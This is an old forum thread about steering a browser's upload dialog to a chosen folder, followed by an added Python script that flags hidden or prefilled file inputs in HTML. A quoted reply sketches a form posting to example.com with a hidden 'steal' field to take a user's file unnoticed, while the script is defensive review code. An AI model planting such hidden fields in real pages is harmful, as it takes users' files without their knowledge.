Posted by Jochem Maas on 01/19/06 16:02
are you sure it was not internet explorer just showing you the last
directory you had opened with a 'browse...' button within that browsing
Jay Blanchard wrote:
>>Along these same lines, does anyone know how to make the file dialog
>>in a specific directory? I saw this the other day but forgot where. I
>>clicked browse and the dialog popped up pointed to My Pictures (which
>>least works for most Windblows users). I meant to look at the code,
> If it *DOES* work, you've probably got yet another security problem in
> Suppose, for example, that I do something like this:
> <form action="http://example.com/" method="post"
> <input style="visibility: hidden" name="steal"
> What's your name? <input name="name"><br />
> Who's your daddy? <input name="daddy"><br />
> <input type="submit">
> Now, the unsuspecting user will be HANDING me the file I shouldn't
> have without ever seeing anything about it.
> Even if it "only" lets you pick the directory, but not the file, it
> probably exposes too much information about my desktop for my tastes.
> Now I need to go back and find it. It was a site having to do with photos,
> but I was doing research and visited a lot of them. Since the upload dialog
> was looking for photos you can see where the apparent convenience could come
> in. But you're right....as a security hole it is big enough for aircraft
> carrier usage.
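The pattern raised in the quoted reply (a file input that is hidden from the user and carries a preset value) can be checked for when reviewing page templates. The following is an added example, not code from any poster in this thread; the sample markup, the `audit` function and the `FileInputAudit` class are constructed for illustration.

```python
from html.parser import HTMLParser

# Constructed sample markup (not the truncated form quoted in the thread).
SAMPLE = """
<form action="/upload" method="post" enctype="multipart/form-data">
  <input type="file" name="photo">
  <input type="file" name="steal" style="visibility: hidden" value="C:\\constructed\\path.txt">
  <input type="FILE" name="doc" hidden>
  <input type="text" name="name" value="prefilled text is fine">
  <input type="submit">
</form>
"""

# Inline CSS declarations that hide an element (whitespace stripped first).
HIDING_CSS = ("visibility:hidden", "display:none")


class FileInputAudit(HTMLParser):
    """Collects (line, name, reasons) for file inputs worth a manual review."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Bare attributes such as `hidden` arrive with value None.
        a = {k: (v or "") for k, v in attrs}
        if tag != "input" or a.get("type", "").lower() != "file":
            return
        reasons = []
        if a.get("value"):
            reasons.append("preset value")
        style = a.get("style", "").replace(" ", "").lower()
        if "hidden" in a or any(css in style for css in HIDING_CSS):
            reasons.append("hidden from user")
        if reasons:
            self.findings.append((self.getpos()[0], a.get("name", ""), reasons))


def audit(html):
    """Return the findings for one HTML document or template."""
    parser = FileInputAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for line, name, reasons in audit(SAMPLE):
        print(f"line {line}: file input {name!r}: {', '.join(reasons)}")
```

Only inline `style` and the `hidden` attribute are inspected; hiding done through an external stylesheet or script is outside what this check sees.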